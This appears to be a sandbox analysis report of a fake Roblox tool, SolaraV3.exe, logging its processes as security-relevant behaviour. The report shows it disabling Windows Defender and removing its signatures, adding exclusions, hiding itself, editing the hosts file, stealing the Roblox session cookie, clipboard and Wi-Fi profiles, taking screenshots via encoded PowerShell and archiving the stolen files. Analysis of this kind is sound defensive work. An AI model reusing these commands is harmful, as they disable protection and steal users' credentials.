Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\SolaraV3.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgA